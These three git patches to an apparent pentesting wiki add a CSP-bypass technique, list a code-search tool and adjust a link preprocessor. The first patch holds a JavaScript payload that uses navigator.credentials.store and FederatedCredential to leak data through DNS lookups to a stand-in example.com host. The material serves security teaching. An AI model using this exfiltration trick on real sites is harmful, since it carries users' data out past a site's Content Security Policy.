From b8d5b73ea48706f19f977c0966c64c76d71c95a5 Mon Sep 17 00:00:00 2001 From: Satoki Date: Sun, 19 Jan 2025 07:44:44 +0900 Subject: [PATCH 1/3] Add CSP Exfiltration Bypass Technic by CredentialsContainer --- .../content-security-policy-csp-bypass/README.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/src/pentesting-web/content-security-policy-csp-bypass/README.md b/src/pentesting-web/content-security-policy-csp-bypass/README.md index c017f6de1..a7d78784c 100644 --- a/src/pentesting-web/content-security-policy-csp-bypass/README.md +++ b/src/pentesting-web/content-security-policy-csp-bypass/README.md @@ -794,6 +794,22 @@ var pc = new RTCPeerConnection({ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp); ``` +### CredentialsContainer + +The credential popup sends a DNS request to the iconURL without being restricted by the page. It only works in a secure context (HTTPS) or on localhost. + +```javascript +navigator.credentials.store( + new FederatedCredential({ + id:"satoki", + name:"satoki", + provider:"https:"+your_data+"example.com", + iconURL:"https:"+your_data+"example.com" + }) + ) +``` + + ## Checking CSP Policies Online - [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com) From 0b49e8d757118bea79148ae2a196abd4aabd1246 Mon Sep 17 00:00:00 2001 From: Michael Sukkarieh Date: Wed, 22 Jan 2025 08:59:06 -0800 Subject: [PATCH 2/3] Update wide-source-code-search.md --- .../external-recon-methodology/wide-source-code-search.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md index a9613ace3..023b7b243 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md @@ -6,7 +6,8 @@ The goal of this page is to enumerate **platforms that allow to search for code* This helps in several occasions to **search for leaked information** or for **vulnerabilities** patterns. -- [**SourceGraph**](https://sourcegraph.com/search): Search in millions of repos. There is a free version and an enterprise version (with 15 days free). It supports regexes. +- [**Sourcebot**](https://www.sourcebot.dev/): Open source code search tool. Index and search across thousands of your repos through a modern web interface. +- [**SourceGraph**](https://sourcegraph.com/search): Search in millions of repos. There is a free version and an enterprise version (with 15 days free). It supports regexes. - [**Github Search**](https://github.com/search): Search across Github. It supports regexes. - Maybe it's also useful to check also [**Github Code Search**](https://cs.github.com/). - [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced_search.html): Search across Gitlab projects. Support regexes. From 5ea057ea11eea50753fe14920a74bcd1027017e4 Mon Sep 17 00:00:00 2001 From: Congon4tor Date: Sun, 26 Jan 2025 17:59:14 +0100 Subject: [PATCH 3/3] update preprocessor --- hacktricks-preprocessor.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py index af5949449..5d070c39f 100644 --- a/hacktricks-preprocessor.py +++ b/hacktricks-preprocessor.py @@ -78,6 +78,9 @@ def ref(matchobj): sys.exit(1) + if href.endswith("/README.md"): + href = href.replace("/README.md", "/index.html") + template = f"""{title}""" # translate_table = str.maketrans({"\"":"\\\"","\n":"\\n"})